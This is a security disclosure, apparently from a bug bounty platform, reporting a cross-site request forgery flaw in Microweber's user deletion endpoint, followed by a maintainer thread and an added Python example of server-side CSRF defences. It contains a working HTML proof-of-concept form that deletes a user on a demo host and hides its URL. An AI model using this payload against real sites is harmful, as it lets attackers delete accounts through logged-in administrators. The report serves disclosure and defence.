Cross-Site Request Forgery (CSRF) in microweber/microweber
Reported on Jul 30th 2021
✍️ Description
An attacker is able to delete any user if they know the value of the user's id parameter.
🕵️♂️ Proof of Concept
After opening PoC.html in Firefox or Safari and clicking the submit button (the form can also be auto-submitted), you will see that the user with id 3 has been deleted.

```html
<!-- PoC.html -->
<html>
<body>
<!-- rewrite the address bar so the page's own URL is not shown -->
<script>history.pushState('', '', '/')</script>
<!-- cross-site POST to the delete_user endpoint; only the id field is required -->
<form action="https://demo.microweber.org/demo/api/delete_user" method="POST">
<input type="hidden" name="id" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
💥 Impact
Here the user with id 3 will be deleted after clicking the submit button.
📍 Location
app.js#L1
Hey microweber team, can you give me some feedback? Thanks so much.
You need to be logged in as admin to perform this action.
Yeah, the main point of any CSRF attack is that the user must already be logged in. Excuse my poor explanation, but this is CSRF and a CWE is already assigned to it.
You can set the Strict value on the SameSite attribute of just one of your cookies, and then nobody will be able to perform any CSRF attacks.
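The two halves of this thread, the forged POST in PoC.html and the SameSite=Strict suggestion above, are easier to reason about with a server-side model in hand. The following is an added example and not Microweber's code: a small Python handler for a hypothetical delete_user endpoint that layers the defences a reviewer would expect. The session cookie is issued with SameSite=Strict (the browser-side fix from the thread; note it only helps when it is set on the cookie the server actually authenticates with), and the handler also checks the Origin/Referer header and a per-session synchronizer token, so the request is still refused if a browser attaches the cookie anyway. `SITE_ORIGIN`, the session store and the request dictionaries are constructed for the demo; the forged request mirrors PoC.html (cookie attached, foreign Origin, no token).

```python
"""Added example (not Microweber's code): CSRF defences for a state-changing
endpoint such as the delete_user action in the report above."""
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical application origin; the PoC in the report posts to demo.microweber.org.
SITE_ORIGIN = "https://demo.microweber.org"


def session_cookie(session_id: str) -> str:
    """Set-Cookie value for the session cookie. SameSite=Strict is the fix
    suggested in the thread: the browser omits this cookie from any request
    initiated by another site, so the forged POST arrives unauthenticated."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Strict"


def new_session(sessions: dict, role: str) -> tuple:
    """Create a session and a per-session CSRF token (synchronizer token pattern)."""
    session_id = secrets.token_hex(16)
    token = secrets.token_hex(16)
    sessions[session_id] = {"role": role, "csrf": token}
    return session_id, token


def is_same_origin(headers: dict) -> bool:
    """Origin/Referer check: browsers send Origin on cross-site form POSTs, so a
    form hosted on another site (like PoC.html) carries a foreign origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # no provenance at all: fail closed
    got, want = urlsplit(source), urlsplit(SITE_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def handle_delete_user(request: dict, sessions: dict, users: dict) -> tuple:
    """Server-side handling of POST /api/delete_user. Returns (status, message)."""
    session = sessions.get(request.get("cookies", {}).get("session", ""))
    if session is None:
        return 401, "not logged in"
    if session["role"] != "admin":
        return 403, "admin only"
    if not is_same_origin(request.get("headers", {})):
        return 403, "cross-site request rejected"
    submitted = request.get("form", {}).get("_token", "")
    # constant-time comparison of the submitted token with the session's token
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "missing or invalid CSRF token"
    user_id = request.get("form", {}).get("id", "")
    if user_id not in users:
        return 404, "no such user"
    del users[user_id]
    return 200, f"user {user_id} deleted"


def demo() -> dict:
    """Replay the report's scenario against the hardened handler with constructed
    requests. The forged one mirrors PoC.html: session cookie attached (as it would
    be without SameSite), foreign Origin, no token."""
    sessions, users = {}, {"1": "admin", "2": "editor", "3": "victim"}
    sid, token = new_session(sessions, "admin")
    forged = {
        "cookies": {"session": sid},
        "headers": {"Origin": "https://attacker.example"},
        "form": {"id": "3"},
    }
    genuine = {
        "cookies": {"session": sid},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"id": "3", "_token": token},
    }
    results = {}
    results["forged"] = handle_delete_user(forged, sessions, users)
    results["users_after_forged"] = sorted(users)
    results["genuine"] = handle_delete_user(genuine, sessions, users)
    results["users_after_genuine"] = sorted(users)
    results["cookie"] = session_cookie(sid)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Running `demo()` shows the forged request stopped with a 403 before any deletion, while the genuine same-origin request carrying the session's token removes user 3. The order of checks matters: authentication first, then origin, then token, so an unauthenticated or cross-site request never reaches the data layer.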
Hello, thanks for the info.
Yes, you are correct, some 3rd-party domain can trick you.
This makes it a valid issue and we will look at how to fix it.
Will update you soon.
Aaahhh, thank you sir, I was doubting my experience :))
Can you also look at some of the other reports and validate them too? (They will be hidden until you make a fix for them.)
@admin can you change the status of this report back to what it was before?
@amammad @peter - I have updated the status of this report to pending. Feel free to mark as valid if you see fit.